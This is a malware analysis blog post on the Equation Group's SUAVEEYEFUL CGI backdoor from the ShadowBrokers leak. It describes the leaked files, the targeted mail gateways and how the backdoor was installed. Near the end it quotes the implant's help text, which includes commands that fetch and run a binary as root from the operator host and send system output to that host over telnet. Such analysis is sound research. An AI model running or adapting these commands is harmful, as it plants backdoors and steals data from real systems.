The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP

2022-6-22 15:19:17 Author: xorl.wordpress.com 阅读量:33 收藏

I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:

  • SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux
  • SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s
  • The leaked file/operation was targeting MiraPoint email products
  • SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware

The Leaked Files

In that directory there are a few different files. Those are:

  • bdes: A copy of the FreeBSD bdes (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD bdes version 1.3.2.1 (from 22 Sep. 2000), but compiled on Linux in 2003.
  • decode-base64: Simple Perl decoding script using MIME::Base64.
  • implant: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).
  • implant.mg1.waseda.ac.jp: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University’s email gateway (variant of the implant file).
  • opscript.se: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.
  • se: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.
  • se.old: Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.

The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like ls, cat, telnet, etc.)

List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory

Targets

The se.old client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.

This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even to today, this IP address (202.99.26.6) still points to an email server from China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.

The current website hosted on mail.mfa.gov.cn

Most of the files included in the leaked directory were designed for another target. The email gateways of the Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”

The se client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.

  • mp450 (10.1.2.208)
  • mg1.waseda.ac.jp (10.9.4.15)
  • 10.1.2.150 – another compromised host

The top host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance. And the other host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.

Simplified visualisation of the SUAVEEYEFUL installation process

Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers

This is clearly described in the opscript.se file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:

  1. Copy the implant to the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi file
  2. Change nph-help.cgi‘s file permissions to 555
  3. Change nph-help.cgi‘s ownership to “root” with group “nobody”
  4. Use touch -r to ensure file nph-help.cgi as well as anything under /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/ directory have the same timestamps as the legitimate /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html MiraPoint web service
  5. Use netcat to start a listening on port 444, decoding the received data with Base64 and decrypting them using bdes with a hardcoded key (0x4790cae5ec154ccc in this case)
  6. Connect-back from mp450‘s SUAVEEYEFUL implant to the listening 4444 port and provide some basic system information (who is logged in, list files/directories, etc.)

The SUAVEEYEFUL Software Implant

The SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple CGI program written in C for FreeBSD, and looking for input at its help endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).

The client side ensures that all requests are properly requested, encoded (using Base64) and encrypted (with DES). The client supported 4 options:

  • -h: Display help message
  • -c: Execute command
  • -i: Input target (e.g. the URL of a host running the SE server component)
  • -k: Key used for DES encryption
Screenshot of the se client used to target the Waseda University

As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:

head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'

The command was then structured with # being used as a separator. The main command to be executed was constructed with this:

echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out

Which results into a format that looks like that:

This structure was then encrypted using the hardcoded DES key, and passed through uriescape tool to ensure that there will be no parsing issues by the receiving MiraPoint web server.

Apart from the above, the client also used the date +”%N” command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.

The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component

Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:

  1. Install a fileless malware by doing the following:
    • Create a hidden directory (/tmp/.scsi)
    • Use curl to download a binary deceivingly named sendmail from the operational host (10.1.2.150:5555/sendmail)
    • Run sendmail as root and connect-back to the operational host on a different port (10.1.2.150:9999)
    • Remove the sendmail binary file so that it’s running only in memory, not from the filesystem
  2. Execute commands with connect-back method:
    • Run w followed by ls -l and ls -l /tmp to get the logged in users and contents of the current and /tmp directories
    • Encrypt and encode the output
    • Send it to the operational host on its listening port (10.1.2.150:4444)
    • The message also guides the operator on how to generate a new DES encryption key
  3. Same as #2 but without the Base64 encoding and DES encryption

Here is the full help message:

1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444

WARNING
WARNING

DO NOT -burn!!!
Use -exit

From: https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/